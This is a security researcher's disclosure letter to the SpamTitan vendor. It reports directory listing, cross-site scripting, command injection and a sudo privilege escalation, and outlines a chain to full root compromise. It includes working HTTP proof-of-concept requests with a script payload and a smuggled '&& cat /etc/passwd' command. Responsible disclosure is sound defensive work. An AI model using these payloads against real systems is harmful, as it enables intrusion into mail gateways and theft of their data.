Hello,
      I'm Luca Carettoni, an independent security researcher. I have found several vulnerabilities in your product "SpamTitan". According to the ethical full disclosure policy (http://www.wiretrip.net/rfp/policy.html), please find enclosed the security findings.

##########################################
(a) Directory listing enabled by default
Severity: Low
Local/Remote: Remote
Proof-of-Concept:
/lib/
/include/
/cluster/
/api/
/amavis-stats/
/js/
/imgs/
/locale/
/styles/
/yui/

##########################################
(b) Multiple Cross-Site Scripting
Severity: Medium
Local/Remote: Remote
Proof-of-Concept:

POST /setup-relay.php HTTP/1.1
Host: x.x.x.x
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://x.x.x.x/setup-relay.php
Cookie: PHPSESSID=7f5ad053266881d4v8b143d2a53f010e; 
Content-Type: multipart/form-data; boundary=--------366333200
Content-Length: 1742

----------366333200
Content-Disposition: form-data; name="button"

Addb26b5"><script>alert(1)</script>69d00f4e5d0

Client-side flaws are widely spead within the application. No input validation is actually performed.
Almost all semi-automatic vulnerability scanners may be able to detect these findings.
For more info: http://en.wikipedia.org/wiki/Cross-site_scripting

##########################################
(c) Arbitrary Code Execution
Severity: Medium (authentication is required)
Local/Remote: Remote
Proof-of-Concept:

POST /runcmd.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Cookie: PHPSESSID=7f5ad053266881d4v8b143d2a53f010e
Content-Type: multipart/form-data; boundary=---------------------------265001916915724
Content-Length: 330

-----------------------------265001916915724
Content-Disposition: form-data; name="action"

ping
-----------------------------265001916915724
Content-Disposition: form-data; name="pinghost"

127.0.0.1 && cat /etc/passwd
-----------------------------265001916915724--

Several scripts are vulnerable to such injection. No input validation at all.

##########################################
(d) Privilege Escalation
Severity: High
Local/Remote: Remote

Abusing the current "sudo" configuration:
...
amavisd ALL=NOPASSWD: /bin/cp
...
It is possible to obtain a root console on the system and entirely compromise the platform.
##########################################

As a result of these findings, it's possible to compromise remotely the entire platform using the following attack scenario:
1) An aggressor send a crafted email to the sysadmin (social engineering required)
2) Exploiting the XSS, an aggressor is able to login to the admin web console
3) Exploiting the code execution weakness, it is possible to execute arbitrary command as "amavisd"
4) Replacing one "sudo" binary with "bin/bash", it's possible to obtain a root console. This is feasible thanks to the sudoers misconfiguration.

This policy encourages open communication, and I look forward to working with you on resolving the problems detailed.

Regards,
Luca C.